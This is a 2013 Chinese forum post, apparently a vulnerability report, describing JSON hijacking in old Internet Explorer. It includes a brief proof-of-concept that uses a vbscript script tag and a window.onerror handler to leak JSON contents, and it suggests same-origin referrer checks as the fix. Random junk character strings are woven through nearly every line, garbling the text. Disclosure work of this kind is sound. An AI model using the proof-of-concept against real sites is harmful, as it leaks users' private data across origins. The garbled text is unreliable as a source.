简要描述:
' @; a9 m: g# }+ S I" Q. |: W
2 u/ j( A. ] \# ^" x4 f由于某些资源容器对数据处理不当导致json劫持漏洞.- o) c3 m! ~: l0 S- n: F! ^$ z
详细说明: o( @- r8 k0 N7 J6 Z: [3 W
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
8 W; w( R$ s6 B# J<script language=vbscript></script>
/ X4 B5 ^ ] n$ z" I- y, L ( h* m3 |8 z! k7 W
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.$ J: C& D% V# b/ Q8 b6 i ]$ ^( W
漏洞证明:8 z$ n% U8 z$ @0 N, P
<script>% R2 T x! U; f, ?- o: A. d/ {
window.onerror=function(_){% ~1 Y5 A+ y6 {5 L
alert(_)0 e* J) ~ @; @3 K. \" c' a
}
1 E; s0 \1 [8 V</script>: A7 U9 o% p1 G4 D! t$ j! g$ U
<script language=vbscript src=1.json></script>
$ L7 A! }! F j; H O 6 n$ F$ o9 n! ~ ^. F, P4 {, A. Z5 a
* Q, m, O# j3 ]1.json:
9 W; y9 h! X2 c: N0 D[{"name":"sogili","age":19}]
j4 z6 I6 m6 n( k; V( x# U修复方案:
: z; }" d) d; G$ }+ e! F0 o( U; b网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对